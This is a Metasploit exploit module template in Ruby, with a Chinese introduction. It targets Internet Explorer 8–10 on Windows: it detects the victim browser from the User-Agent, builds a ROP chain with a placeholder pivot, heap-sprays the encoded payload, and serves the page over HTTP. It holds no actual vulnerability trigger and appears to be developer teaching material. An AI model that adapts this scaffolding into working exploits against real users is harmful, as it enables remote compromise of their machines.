Windows浏览器示例利用

此模板涵盖 IE8/9/10，并使用 User-Agent HTTP 头来检测浏览器版本。请注意，IE8 及更高版本可能会以兼容模式模拟较旧的 IE 版本，此时模块将无法正确检测浏览器；此外 User-Agent 完全由客户端控制、可被随意伪造，因此 “Automatic” 目标选择只能视为尽力而为的手段，检测错误会导致选用错误的 ROP 链。这是一个用于开发浏览器漏洞利用模块的 Metasploit 示例模板。


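class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
  include Msf::Exploit::Remote::BrowserAutopwn

  # Browser Autopwn registration.  Set :classid and :method for ActiveX
  # exploits, for example:
  #   :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
  #   :method  => "SetShapeNodeType",
  autopwn_info({
    :ua_name    => HttpClients::IE,
    :ua_minver  => "8.0",
    :ua_maxver  => "10.0",
    :javascript => true,
    :os_name    => OperatingSystems::Match::WINDOWS,
    :rank       => NormalRanking
  })

  # Maps the "Windows NT x.y" token of an IE User-Agent to the OS label used
  # in the 'Targets' names below.  NT versions not listed here (e.g. 5.2 for
  # XP x64 / Server 2003) have no target and are answered with a 404.
  NT_OS_NAMES = {
    '5.1' => 'Windows XP SP3',
    '6.0' => 'Windows Vista',
    '6.1' => 'Windows 7',
    '6.2' => 'Windows 8',
    '6.3' => 'Windows 8.1'
  }.freeze

  # Module metadata.  'Targets' names must contain the "IE <n>" and OS labels
  # that get_target matches against; 'Rop' selects the chain in get_payload.
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Module Name",
      'Description'    => %q{
        This template covers IE8/9/10, and uses the user-agent HTTP header to detect
        the browser version.  Please note IE8 and newer may emulate an older IE version
        in compatibility mode, in that case the module won't be able to detect the
        browser correctly.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'sinn3r' ],
      'References'     =>
        [
          [ 'URL', 'http://metasploit.com' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
          [ 'IE 8 on Windows Vista',  { 'Rop' => :jre } ],
          [ 'IE 8 on Windows 7',      { 'Rop' => :jre } ],
          [ 'IE 9 on Windows 7',      { 'Rop' => :jre } ],
          [ 'IE 10 on Windows 8',     { 'Rop' => :jre } ]
        ],
      'Payload'        =>
        {
          # NUL terminates the unescape()d JavaScript string the payload is
          # sprayed through (see get_html), so it can never appear in it.
          # The original listing dropped the comma after this value, which
          # is a Ruby syntax error.
          'BadChars'        => "\x00",
          'StackAdjustment' => -3500
        },
      'Privileged'     => false,
      'DisclosureDate' => "Apr 1 2013",
      'DefaultTarget'  => 0))
  end

  # Selects the target for a request.  When the user picked an explicit
  # target it is returned unchanged; for 'Automatic' the browser and OS are
  # derived from the User-Agent header.
  #
  # @param agent [String, nil] raw User-Agent header; nil when the client
  #   sent none (tolerated: treated as "no match")
  # @return [Msf::Module::Target, nil] nil when no target matches
  #
  # The User-Agent is entirely client-controlled and trivially spoofed, and
  # IE in compatibility mode reports an older "MSIE" token, so Automatic is
  # best-effort only: a wrong guess selects the wrong ROP chain.
  def get_target(agent)
    return target if target.name != 'Automatic'

    ua = agent.to_s
    nt = ua.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    # Capture the full major version: "MSIE 10.0" must become "IE 10", not
    # "IE 1", which only substring-matched "IE 10 ..." by accident and would
    # also match any future two-digit version.
    ie = ua.scan(/MSIE (\d+)/).flatten[0] || ''
    return nil if nt.empty? || ie.empty?

    # Unknown NT version: bail out instead of calling include?(nil), which
    # raised TypeError inside the request handler in the original.
    os_name = NT_OS_NAMES[nt]
    return nil if os_name.nil?

    ie_name = "IE #{ie}"
    targets.find { |t| t.name.include?(ie_name) && t.name.include?(os_name) }
  end

  # Builds the ROP chain plus encoded payload for the given target.
  #
  # @param t [Msf::Module::Target] selected target; t['Rop'] picks the chain
  # @return [String] ROP payload produced by RopDb, pivot included
  def get_payload(t)
    # Placeholder pivot ("ABCD"); a real module must supply the address of a
    # stack-pivot gadget appropriate for the chosen ROP DLL.
    stack_pivot = "\x41\x42\x43\x44"
    code        = payload.encoded

    if t['Rop'] == :msvcrt
      print_status("Using msvcrt ROP")
      generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
    else
      # Every listed target uses :jre; any other value also falls back here.
      print_status("Using JRE ROP")
      generate_rop_payload('java', code, {'pivot'=>stack_pivot})
    end
  end

  # Renders the exploit page: the js_property_spray helper followed by a heap
  # spray of the unescape()d payload for target +t+.
  #
  # @param t [Msf::Module::Target]
  # @return [String] HTML document
  def get_html(t)
    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
    html = %Q|
      <script>
      #{js_property_spray}

      var s = unescape("#{js_p}");
      sprayHeap({shellcode:s});
      </script>
    |

    # Intended to strip the template's leading indentation.  NOTE(review):
    # this source is space-indented, so the tab pattern never matches and the
    # indentation is sent as-is; harmless to the browser, kept for fidelity.
    html.gsub(/^\t\t/, '')
  end

  # HTTP request handler: picks a target from the client's User-Agent and
  # serves the exploit page, or a 404 when the browser is not supported.
  #
  # @param cli [Rex::Socket] client connection
  # @param request [Rex::Proto::Http::Request] parsed request
  # @return [void]
  def on_request_uri(cli, request)
    # nil when the client sends no User-Agent; get_target handles that.
    agent = request.headers['User-Agent']
    print_status("Requesting: #{request.uri}")

    # Local named 'selected' so it does not shadow the target() accessor.
    selected = get_target(agent)
    if selected.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    print_status("Target selected as: #{selected.name}")
    html = get_html(selected)
    send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
  end
end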


